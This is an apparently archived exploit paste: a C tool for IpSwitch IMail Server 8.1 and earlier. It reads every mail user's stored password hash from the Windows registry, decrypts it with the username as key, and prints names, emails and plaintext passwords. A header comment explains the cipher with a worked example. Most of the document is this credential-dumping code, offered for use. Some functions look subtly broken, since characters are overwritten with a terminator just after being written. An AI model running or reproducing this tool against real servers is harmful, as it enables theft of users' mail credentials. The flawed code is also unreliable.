Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*********************************************************************************
- * IpSwitch IMail Server <= ver 8.1 User Password Decryption
- *
- * by Adik < netmaniac hotmail KG >
- *
- * IpSwitch IMail Server uses weak encryption algorithm to encrypt its user passwords. It uses
- * polyalphabetic Vegenere cipher to encrypt its user passwords. This encryption scheme is
- * relatively easy to break. In order to decrypt user password we need a key. IMail uses username
- * as a key to encrypt its user passwords. The server stores user passwords in the registry under the key
- * "HKEY_LOCAL_MACHINE\SOFTWARE\IpSwitch\IMail\Domains\<domainname>\Users\<username>\Password".
- * Before decrypting password convert all upper case characters in the username to lower case
- * characters. We use username as a key to decrypt our password.
- * In order to get our plain text password, we do as follows:
- * 1) Subtract hex code of first password hash character by the hex code of first username character.
- * The resulting hex code will be our first decrypted password character.
- * 2) Repeat above step for the rest of the chars.
- *
- * Look below, everythin is dead simple ;)
- * eg:
- *
- * USERNAME: netmaniac
- * PASSWORDHASH: D0CEE7D5CCD3D4C7D2E0CAEAD2D3
- * --------------------------------------------
- *
- * D0 CE E7 D5 CC D3 D4 C7 D2 E0 CA EA D2 D3 <- password hash
- * - 6E 65 74 6D 61 6E 69 61 63 6E 65 74 6D 61 <- hex codes of username
- * n e t m a n i a c n e t m a <- username is a key
- * -----------------------------------------
- * 62 69 73 68 6B 65 6B 66 6F 72 65 76 65 72 <- hex codes of decrypted password
- * b i s h k e k f o r e v e r <- actual decrypted password
- *
- *
- * pwdhash_hex_code username_hex_code decrypted_password
- * ------------------------------------------------------------------
- * D0 - 6E (n) = 62 (b)
- * CE - 65 (e) = 69 (i)
- * E7 - 74 (t) = 73 (s)
- * D5 - 6D (m) = 68 (h)
- * CC - 61 (a) = 6B (k)
- * D3 - 6E (n) = 65 (e)
- * D4 - 69 (i) = 6B (k)
- * C7 - 61 (a) = 66 (f)
- * D2 - 63 (c) = 6F (o)
- * E0 - 6E (n) = 72 (r)
- * CA - 65 (e) = 65 (e)
- * EA - 74 (t) = 76 (v)
- * D2 - 6D (m) = 65 (e)
- * D3 - 61 (a) = 72 (r)
- * ------------------------------------------------------------------
- *
- * I've included a lil proggie to dump all the usernames/passwords from local machine's registry.
- * Have fun!
- * //Send bug reports to netmaniac[at]hotmail.KG
- *
- * Greets to: my man wintie from .au, Chintan Trivedi :), jin yean ;), Morphique
- *
- * [16/August/2004] Bishkek
- *********************************************************************************/
- //#include "stdafx.h"
- #include <stdio.h>
- #include <stdlib.h>
- #include <string.h>
- #include <ctype.h>
- #include <windows.h>
- #define snprintf _snprintf
- #pragma comment(lib,"advapi32")
- #define ALLOWED_USERNAME_CHARS "A-Z,a-z,0-9,-,_,."
- #define MAX_NUM 1024 //500
- #define DOMAINZ "Software\\IpSwitch\\IMail\\Domains"
- #define VER "1.1"
- #define MAXSIZE 100
- int total_accs=0;
- int total_domainz=0,total_domain_accs=0;
- /*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO*/
- void greetz()
- {
- printf( "\n\t--= [ IpSwitch IMail Server User Password Decrypter ver %s] =--\n\n"
- "\t\t (c) 2004 by Adik ( netmaniac [at] hotmail.KG )\n\n\n",VER);
- }
- /*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO*/
- void usage()
- {
- printf( "------------------------------------------------------------------------\n");
- printf( " Imailpwdump [-d] -- Dumps IMail Server user/pwds from local registry\n\n"
- " Imailpwdump [username] [passwordhash] -- User/PwdHash to decrypt\n\n"
- " eg: Imailpwdump netmaniac D0CEE7D5CCD3D4C7D2E0CAEAD2D3\n");
- printf( "------------------------------------------------------------------------\n");
- }
- /*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO*/
- void str2hex(char *hexstring, char *outbuff)
- {
- unsigned long tmp=0;
- char tmpchr[5]="";
- memset(outbuff,0,strlen(outbuff));
- if(strlen(hexstring) % 2)
- {
- printf(" Incorrect password hash!\n");
- exit(1);
- }
- if(strlen(hexstring)>MAXSIZE)
- {
- printf(" Password hash is too long! \n");
- exit(1);
- }
- for(unsigned int i=0, c=0; i<strlen(hexstring); i+=2, c++)
- {
- memcpy(tmpchr,hexstring+i,2);
- tmp = strtoul(tmpchr,NULL,16);
- outbuff[c] = (char)tmp;
- }
- }
- /*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO*/
- void str2smallcase(char *input)
- {
- if(strlen(input)>MAXSIZE)
- {
- printf(" Username too long! \n");
- return;
- }
- for(unsigned int i=0;i<strlen(input);i++)
- {
- if(isalnum(input[i]) || input[i] == '-' || input[i]=='_' || input[i]=='.')
- input[i] = tolower(input[i]);
- else
- {
- printf(" Bad characters in username!\n Allowed characters: %s\n",ALLOWED_USERNAME_CHARS);
- return;
- }
- }
- }
- /*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO*/
- void populate(char *input,unsigned int size)
- {
- char tmp[MAX_NUM]="";
- unsigned int strl = strlen(input);
- strcpy(tmp,input);
- //netmaniacnetmaniacnetman
- for(unsigned int i=strlen(input),c=0;i<size;i++,c++)
- {
- if(c==strl)
- c=0;
- input[i] = tmp[c];
- input[i]='\0';
- }
- }
- /*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO*/
- void imail_decrypt(char *username, char *pwdhash,char *outbuff)
- {
- //adik 123456
- //adikbek 123
- if(strlen(pwdhash) <= strlen(username) )
- {
- memset(outbuff,0,sizeof(outbuff));
- for(unsigned int i=0;i<strlen(pwdhash);i++)
- {
- outbuff[i] = (pwdhash[i]&0xff) - (username[i]&0xff);
- outbuff[i]='\0';
- }
- }
- }
- /*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO*/
- void get_usr_pwds(char *subkey,char *usr)
- {
- long res;
- HKEY hPwdKey;
- char username[MAXSIZE]="";
- char passwdhash[MAXSIZE*2]="", passwd[MAXSIZE]="",clearpasswd[MAXSIZE]="";
- char fullname[MAXSIZE]="";
- char email[MAXSIZE]="";
- DWORD lType;
- DWORD passwdhashsz=sizeof(passwdhash)-1,fullnamesz=MAXSIZE-1,emailsz=MAXSIZE-1;
- res = RegOpenKeyEx(HKEY_LOCAL_MACHINE,subkey,0,KEY_ALL_ACCESS,&hPwdKey);
- if(res!=ERROR_SUCCESS)
- {
- printf(" Error opening key %s! Error #:%d\n",subkey,res);
- exit(1);
- //return;
- }
- if(RegQueryValueEx(hPwdKey,"Password",0,&lType,(LPBYTE)passwdhash,&passwdhashsz)!= ERROR_SUCCESS)
- {
- RegCloseKey(hPwdKey);
- return;
- }
- if(RegQueryValueEx(hPwdKey,"FullName",0,&lType,(LPBYTE)fullname,&fullnamesz)!= ERROR_SUCCESS)
- {
- RegCloseKey(hPwdKey);
- return;
- }
- if(RegQueryValueEx(hPwdKey,"MailAddr",0,&lType,(LPBYTE)email,&emailsz)!=ERROR_SUCCESS)
- {
- RegCloseKey(hPwdKey);
- return;
- }
- str2smallcase(usr);
- strncpy(username,usr,sizeof(username)-1);
- str2hex(passwdhash,passwd);
- // adik 1234567
- // adik 12
- if(strlen(passwd)>strlen(username))
- populate(username,strlen(passwd));
- imail_decrypt(username,passwd,clearpasswd);
- printf( "------------------------------------------------------------------------\n"
- " FullName:\t %s\n"
- " Email:\t\t %s\n"
- " Username:\t %s\n"
- " Password:\t %s\n",
- fullname,email,usr,clearpasswd);
- total_accs++;
- RegCloseKey(hPwdKey);
- }
- /*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO*/
- void dump_registry_pwds()
- {
- HKEY hKey,hUserKey;
- DWORD domRes=0,usrRes=0, domlen=0,userlen=0,domIndex=0,userIndex=0;
- FILETIME ftime;
- char domain[150]="";
- char user[150]="";
- char tmpbuff[MAX_NUM]="";
- char usrtmpbuff[MAX_NUM]="";
- domRes = RegOpenKeyEx(HKEY_LOCAL_MACHINE,DOMAINZ,0,KEY_ALL_ACCESS,&hKey);
- if(domRes!=ERROR_SUCCESS)
- {
- printf(" Error opening key '%s'!\n IMail not installed?? Error #:%d\n",DOMAINZ,domRes);
- exit(1);
- }
- do
- {
- domlen=sizeof(domain)-1;
- domRes=RegEnumKeyEx(hKey,domIndex,domain,&domlen,NULL,NULL,NULL,&ftime);
- if(domRes!=ERROR_NO_MORE_ITEMS)
- {
- printf("\n DOMAIN:\t [ %s ]\n",domain);
- userIndex=0;
- total_accs=0;
- snprintf(tmpbuff,sizeof(tmpbuff)-1,"%s\\%s\\Users",DOMAINZ,domain);
- usrRes = RegOpenKeyEx(HKEY_LOCAL_MACHINE,tmpbuff,0,KEY_ALL_ACCESS,&hUserKey);
- if(usrRes==ERROR_SUCCESS)
- {
- //adik
- do
- {
- userlen=sizeof(user)-1;
- usrRes=RegEnumKeyEx(hUserKey,userIndex,user,&userlen,NULL,NULL,NULL,&ftime);
- if(usrRes!=ERROR_NO_MORE_ITEMS)
- {
- snprintf(usrtmpbuff,sizeof(usrtmpbuff)-1,"%s\\%s\\Users\\%s",DOMAINZ,domain,user);
- get_usr_pwds(usrtmpbuff,user);
- }
- userIndex++;
- }
- while(usrRes!=ERROR_NO_MORE_ITEMS);
- RegCloseKey(hUserKey);
- printf("\n\t Total:\t %d Accounts\n",total_accs);
- total_domain_accs += total_accs;
- total_domainz++;
- }
- domIndex++;
- }
- }
- while(domRes != ERROR_NO_MORE_ITEMS);
- RegCloseKey(hKey);
- //total_domains += dom
- printf("\n Total:\t %d Domains, %d Accounts\n",total_domainz,total_domain_accs);
- }
- /*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO*/
- void decrypt_usr_pass(char *usr,char *passwd)
- {
- char username[MAX_NUM]="";
- char passwordhash[MAX_NUM]="";
- char outputbuff[250]="";
- str2smallcase(usr);
- strncpy(username,usr,sizeof(username)-1);
- str2hex(passwd,passwordhash);
- printf("------------------------------------------------------------------------\n");
- printf( " Username:\t\t %s\n"
- " Passwordhash:\t\t %s\n",usr,passwd);
- if(strlen(passwordhash)>strlen(username))
- populate(username,strlen(passwordhash));
- imail_decrypt(username,passwordhash,outputbuff);
- printf(" Decrypted passwd:\t %s\n",outputbuff);
- printf("------------------------------------------------------------------------\n");
- }
- /*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO*/
- void main(int argc, char *argv[])
- {
- greetz();
- if(argc ==2 && strncmp(argv[1],"-d",2)==0 )
- {
- //dump passwd from registry
- dump_registry_pwds();
- }
- else if(argc == 3 && strncmp(argv[1],"-d",2)!=0)
- {
- //decrypt username passwd
- decrypt_usr_pass(argv[1],argv[2]);
- }
- else
- {
- usage();
- return;
- }
- // ThE eNd
- }
- /*OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO*/
- // milw0rm.com [2004-08-18]
Add Comment
Please, Sign In to add comment